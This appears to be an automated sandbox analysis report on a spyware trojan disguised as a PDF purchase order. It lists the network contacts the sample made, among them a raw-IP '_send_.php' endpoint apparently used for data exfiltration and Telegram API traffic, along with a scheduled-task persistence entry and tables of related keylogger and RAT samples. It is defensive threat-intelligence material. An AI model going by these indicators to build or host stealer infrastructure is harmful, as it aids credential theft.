http://checkip.dyndns.org/q	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3879338940.0000000000434000.00000040.00000400.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.000000000334D000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.000000000300C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.000000000324E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1460284409.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1497081679.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3879338940.0000000000434000.00000040.00000400.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3879338940.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541879
Start date and time:	2024-10-25 09:16:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/11@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 177 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Simulations

Behavior and APIs

Time	Type	Description
03:17:07	API Interceptor	8205400x Sleep call for process: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe modified
03:17:08	API Interceptor	24x Sleep call for process: powershell.exe modified
03:17:10	API Interceptor	6230906x Sleep call for process: QeSBxb.exe modified
09:17:08	Task Scheduler	Run new task: QeSBxb path: C:\Users\user\AppData\Roaming\QeSBxb.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Quote1.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	g1TLK7mbZD.img	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	MassLogger RAT	Browse
	kQyd2z80gD.exe	Get hash	malicious	DCRat	Browse
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	226999705-124613-sanlccjavap0004-67.exe	Get hash	malicious	Snake Keylogger	Browse
	BT-036016002U_RFQ 014-010-02024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	RFQ_64182MR_PDF.R00.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Circular_no_088_Annexure_pdf.html	Get hash	malicious	HTMLPhisher	Browse
188.114.97.3	https://is.gd/6NgVrQ	Get hash	malicious	HTMLPhisher	Browse	aa.opencompanies.co.uk/vEXJm/
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/KXy1F
	01YP9Lwum8.exe	Get hash	malicious	DCRat	Browse	77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
	PO-000041522.exe	Get hash	malicious	FormBook	Browse	www.freedietbuilder.online/nnla/
	http://onlinecheapflights.net/	Get hash	malicious	Unknown	Browse	onlinecheapflights.net/
	Technical Datasheet and Specification_PDF.exe	Get hash	malicious	Unknown	Browse	www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
	request-BPp -RFQ 0975432.exe	Get hash	malicious	PureLog Stealer	Browse	www.ergeneescortg.xyz/guou/
	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	FormBook	Browse	www.thetahostthe.top/9r5x/
	http://comodozeropoint.com/updates/1736162964/N1/Team.exe	Get hash	malicious	Unknown	Browse	comodozeropoint.com/updates/1736162964/N1/Team.exe
	SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
132.226.247.73	22390016593_20210618_14375054_HesapOzeti.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Halkbank_Ekstre_20241022_081224_563756.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	080210232024.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	WBPWLAj09q.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	69-33-600 Kreiselkammer ER3.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	eFo07GvEf0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Quote1.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	22390016593_20210618_14375054_HesapOzeti.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	g1TLK7mbZD.img	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	EKSTRE_1022.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Purchase Order.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Halkbank_Ekstre_20241022_081224_563756.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	SIPARIS-290124.PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	Renommxterne.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	PAYMENT ADVISE MT107647545.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
checkip.dyndns.com	Quote1.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	22390016593_20210618_14375054_HesapOzeti.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	g1TLK7mbZD.img	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	EKSTRE_1022.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Purchase Order.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Halkbank_Ekstre_20241022_081224_563756.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	SIPARIS-290124.PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Renommxterne.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	PAYMENT ADVISE MT107647545.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
api.telegram.org	Quote1.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	g1TLK7mbZD.img	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	kQyd2z80gD.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	226999705-124613-sanlccjavap0004-67.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	BT-036016002U_RFQ 014-010-02024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ_64182MR_PDF.R00.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Circular_no_088_Annexure_pdf.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Quote1.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	g1TLK7mbZD.img	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	kQyd2z80gD.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	226999705-124613-sanlccjavap0004-67.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	BT-036016002U_RFQ 014-010-02024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ_64182MR_PDF.R00.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Circular_no_088_Annexure_pdf.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
CLOUDFLARENETUS	https://t.ly/BavariaFilmGmbH2410	Get hash	malicious	Unknown	Browse	188.114.96.3
	Quote1.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	runtime.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	runtime.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	lUAc7lqa56.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	https://temp.farenheit.net/XL1VkZE1FVGZjL0VwUUt5cWc4dkk1SWpqVFFTMUtQZ0krRFhobktOS05RSWpVMTZIYzk3b3hOUTBoZ2VYdnAzM21wZnYwMVBmdGN0MW12M09qVmMzbnNVeVpkeXBxeHVGd2V4eDRvVlZ5dERsakpjbGV3ZVZxRVhlZ0F6Q3hwQlptYUUyRFhHRzY3YkRXQ3hjWmhBZDBpMkNpakJDSnhzUG9xa2k2ZkdacVpDZVhFVFppeUJLcHJIaC0teVVJeERBTFd0K3k3b01rYS0tRk9zSWNIVEd0blVHZVlhTlFnVUxldz09?cid=2242420613	Get hash	malicious	Unknown	Browse	104.18.90.62
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	104.18.91.123
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	104.22.149.180
	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
UTMEMUS	Quote1.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	128.169.88.233
	22390016593_20210618_14375054_HesapOzeti.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Halkbank_Ekstre_20241022_081224_563756.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	SIPARIS-290124.PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	080210232024.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	WBPWLAj09q.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Adeleidae.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Quote1.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	22390016593_20210618_14375054_HesapOzeti.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	g1TLK7mbZD.img	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	EKSTRE_1022.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Purchase Order.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Halkbank_Ekstre_20241022_081224_563756.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	SIPARIS-290124.PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	Renommxterne.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	PAYMENT ADVISE MT107647545.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	copia de pago____xls.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	Quote1.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	runtime.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	runtime.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://temp.farenheit.net/XL1VkZE1FVGZjL0VwUUt5cWc4dkk1SWpqVFFTMUtQZ0krRFhobktOS05RSWpVMTZIYzk3b3hOUTBoZ2VYdnAzM21wZnYwMVBmdGN0MW12M09qVmMzbnNVeVpkeXBxeHVGd2V4eDRvVlZ5dERsakpjbGV3ZVZxRVhlZ0F6Q3hwQlptYUUyRFhHRzY3YkRXQ3hjWmhBZDBpMkNpakJDSnhzUG9xa2k2ZkdacVpDZVhFVFppeUJLcHJIaC0teVVJeERBTFd0K3k3b01rYS0tRk9zSWNIVEd0blVHZVlhTlFnVUxldz09?cid=2242420613	Get hash	malicious	Unknown	Browse	149.154.167.220
	nicegirlwithnewthingswhichevennobodknowthatkissingme.hta	Get hash	malicious	Cobalt Strike	Browse	149.154.167.220
	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.220
	EXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletOpsistype.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220
	QYP0tD7z0c.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	https://docsend.com/view/44v95uq7wngs3w6t	Get hash	malicious	HTMLPhisher, HtmlDropper	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Roaming\QeSBxb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.352427679901606
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
MD5:	3978978DE913FD1C068312697D6E5917
SHA1:	1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
SHA-256:	33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
SHA-512:	78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.log

Download File

Process:	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.352427679901606
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
MD5:	3978978DE913FD1C068312697D6E5917
SHA1:	1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
SHA-256:	33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
SHA-512:	78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZVyus:lGLHyIFKL3IZ2KRH9Ougos
MD5:	F8C462B0F7651DB9CEF8003667880DD9
SHA1:	AE39DE29225FAED9F09BEEA289FAD0C7AD659D1F
SHA-256:	C4E627CC68F1B43600B88A4C62690F1C41107602A19FB9C6ACBF0BD302FA03F4
SHA-512:	5CFA7F7EC6C990E8C54F8954137A9DC8DDEE3868235F0C5A7151A63E82E576FC40AD950F5E9EBB1612B53AD0A7E1CA07E9102A21A2B1CDE302CE39F6A89C30CA
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpy1nvyv.adq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm1pc1mb.ejw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3ucg1e3.5ka.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zan2lbe3.044.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp

Download File

Process:	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.106801165549276
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtcxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTcv
MD5:	01B91296F5833DCCD5611DA4973FF3D0
SHA1:	9C2CBAE87B70F817DD4ACF46781C2B62D798DA53
SHA-256:	A422C7FB747314414CE1680FCF1067EC9CDBEF14C1A304B5B0FA7A9BF97DC785
SHA-512:	C3454E1FCD6B193AF68355E99CEB87337F7D70BC740715A599B964C7FC7B170F587EB6E697B55FC6FE64391256056BF747DA2D9C846585A97512A8819415D2A9
